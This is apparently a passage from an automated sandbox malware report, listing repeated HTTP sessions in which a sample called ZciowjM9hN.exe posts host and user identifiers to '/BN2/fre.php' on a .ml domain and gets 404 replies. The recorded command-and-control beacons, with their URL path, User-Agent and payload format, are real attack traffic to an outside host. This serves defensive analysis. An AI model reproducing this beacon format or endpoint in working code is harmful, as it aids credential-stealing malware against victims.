Jun 9, 2022 12:19:55.001300097 CEST	9110	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G3G2LTU6xT1dIa75ZTBrzQ3h%2FkMs8SMZZVyD0xE1mwxPV4oI%2BfTWjwL5TflyLYScrVSEauIaxgoYCV%2FBM%2FCPSBliFp2pqJ19qnMpTine9wUNMJDhTCncN7VkkcyhtHihTI3nXhGGS1Gq8UwVROle%2FFD%2FHSXb6NWl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921b3efe7695e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49752	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:18:54.883060932 CEST	1156	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:18:54.900248051 CEST	1156	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:18:55.062665939 CEST	1157	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:18:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uXy6R7N7z6LEN7AqRfBg%2FobdSWvsk%2FLampU5yejxWJM2gvbvHC2ZCrIkO26QjFnX3bh3ZHDAOxsB4VOa%2BxCvUz1BvSmDWPzNbtq1WDKY0JZUlbMHCmVn%2BgBpo4c85RuyeQ8YJ4u1mTZmewNjz2FR8b1AjoQnawqT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189203d0a686958-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49797	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:56.597737074 CEST	9111	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:56.614737988 CEST	9111	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:56.728569984 CEST	9112	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G7ZsxWumLaKED6%2BYuJWBrIh6SR%2BiN8pmPfmg9yBLW2iVPcopZ2CEw5GBgS%2FPH%2BvFaKHJG1ZhsaNmrCIukGN2NfbXxJbYUox2BZVWmSnfiajX4SxZFxwhEYISY4TRGqJlkk0kdngAog6gZn1o0s7j%2F7r%2FdI0SN3Ef"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921becb2e916e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49798	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:58.002191067 CEST	9113	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:58.019359112 CEST	9113	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:58.143650055 CEST	9114	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uJ2aFj%2FLxcIdQjIzKvG1YFZWmuKbjRzrGOHigFeW%2F0gfHpqz94T%2B9jaeJDSMrGYwGhuqVsxvVTKhQAbqcEuUgxy8i4guLWtU6nxuKttnFEDoMWzKPhiOGY%2FYUQRR6esACpT93Q9%2B6uAsTOB5hX2Nsddc%2FdtdviGR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921c78d7d9b31-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49799	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:59.356295109 CEST	9115	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:59.373226881 CEST	9115	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:59.465481997 CEST	9116	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CZCSVxti0SgA80WOzuEVPjdcUv50IHeySFN3l6uLlOqZe8AfRLBStR5csKteHUIWWBOCTCbfPNtFYFoP%2FBn0c5gW2GfI5fwpllAlrj58KRxYEFc9iOWoT0XTo3JoqqDiFCqslIKiZ13kLfi5MPgGXpwTzNPNndMl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921cffb62915c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49800	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:00.829407930 CEST	9116	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:00.846927881 CEST	9117	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:00.950195074 CEST	9117	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2tnouE8fC1OzBx8aEG%2BibOKpZ%2Bf0U37UTiFX2OSnZFaYDM%2BH%2F28UwnLOeCq7iFzTYUqOr%2B3dUX8hePJZHjsUuOLp%2FIyX8%2Ffh49iF0iEZ7OhqGhGduzQ%2BHQ9EWq4QhhwDcu9P3YO4cAen8t1qZP%2FMw2tuq0ONJpL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921d93e609170-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49801	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:02.469934940 CEST	9118	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:02.486865044 CEST	9119	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:02.583328962 CEST	9119	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LIjFWBJTliMzhKaPKdlIAjNfzDzF8n4eUmujo7eXscM72m6%2BPHkx7ZzKQ134WTCVMed8yE2z4cKUp4NTu96TfiX7mpes5aC9tm6y%2Ftk%2FWWKpeairLIh8s03nuVB95bJnduruh2ku2ayW29uejjni8WifuuYbQGk2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921e37c369b5e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49802	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:04.084400892 CEST	9120	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:04.101706028 CEST	9121	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:04.228653908 CEST	9121	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wzvt8Oxf3apHGM86JoNVTJ9Zl094cuQkxanzM6QHknqiFP9xkEnZ1EzDR6mQXgALOLv8UuM0ILGd26zz2%2BjC2rd%2B9u9dPvj9s1k8p4B8437tdRYW3zKq8oPJA8wkIvxG0kthqpZQG4u0QYKFvThjSlFuPea1LMTH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921ed8f73695e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49803	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:05.555366039 CEST	9122	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:05.572520018 CEST	9123	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:05.664393902 CEST	9123	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sDApajoeuGLlKNOy%2F3JHZ9gaRm59K7%2FvdsaUznF5Rimxf1lT7NXq31nWEGPBh2lJ3PSUwkmpXc%2BWo%2FywuEQa3CE2iAcOsQAXc6WOp0StFcy7ktCqKE7F%2BmnKQ%2BRUCc2F6qiPeZXKvhC0OUxsEvjTqPOcLoAZiCo0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718921f6ba759232-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49804	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:07.542974949 CEST	9124	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:07.559847116 CEST	9125	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:07.654144049 CEST	9125	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qkr3peN44f4yiecLrOo19VUN7WuLignZRc3prj%2F0wCXHN4z4ht2E2SViYKaXKBvsmPbEaz2qEjaaWSNv69HaN9mqwIg8OTSotBfRHXWP9BL8IIrruUCQvZ%2FoSfuhCOjrNCXQz7fCIpA8RTHPO8XceYoYtfCAZxy4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718922032a249b67-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49805	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:10.598373890 CEST	9126	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:10.615540981 CEST	9127	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:10.712814093 CEST	9127	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TDXXK0zHeD4APIk0H5z6ru%2FAukzSNKnYXzfSqVMsNrM2ILCHNXrHtMLwv6KZWsXIY6sB5zZYj4dORXoDkGfYu1Vw48vFAga1yTSq0qHfcHDu4heJxHAai3VEHtKnRi6T40pm6qPlcPLB7D72iEAR1FNZnI0hpG43"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718922164f899a0f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49807	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:13.436188936 CEST	9133	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:13.453449965 CEST	9133	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:13.591089010 CEST	9134	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUc4QnyTCy5MFbFiUmBZJ%2FeciYG41%2FR4sFYEdMYMcKRnNflJ3ciOhO4Qe%2BVxcLbHX1TX0gwLAO8DUSonXw2PQZTQwEGcZAcXVxz43HVjrahJb2Vaw7aKO%2BhiqVDVTsYCEoDxd0j439xiIq3%2BMQ0mv%2FpyviY3jyjS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892227fc439b3f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49761	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:18:59.590863943 CEST	1274	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:18:59.607702017 CEST	1274	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:18:59.765675068 CEST	1290	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:18:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3i%2BZz5EhRQLQWQjZgzwTku667al%2BHg9Nauc6yBlKELNFuVfQHJPwnyWDSu2chRBXzQZm6mEQGVYSzmQER86IlW8opZ7OA5ejtvPL1%2FbdeTcdEEw0KE5YezcNMIaLHwPcbA6ZZqnqeq%2FL9kt8g1NJ3iBGZukocF0d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189205a7b379223-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49810	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:16.253890038 CEST	9145	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:16.270906925 CEST	9146	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:16.367387056 CEST	9147	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LSprzcntTNi%2F5iEENCb5rMe9er58Bid7mIAEPw57AoFa5UegKCPU0WnZ1w8w0Ih%2Fpp3JFaCjyPwMGdw6UrUNJO6Ah5J79YPm1%2BGquvY72ji0gB94kxfKdfBSPVmcKq4vcL5oeIdrF4eSwb%2F3XiRJAKqkIwue8qPq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718922399c558fe8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49817	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:18.206398964 CEST	9162	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:18.223212957 CEST	9162	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
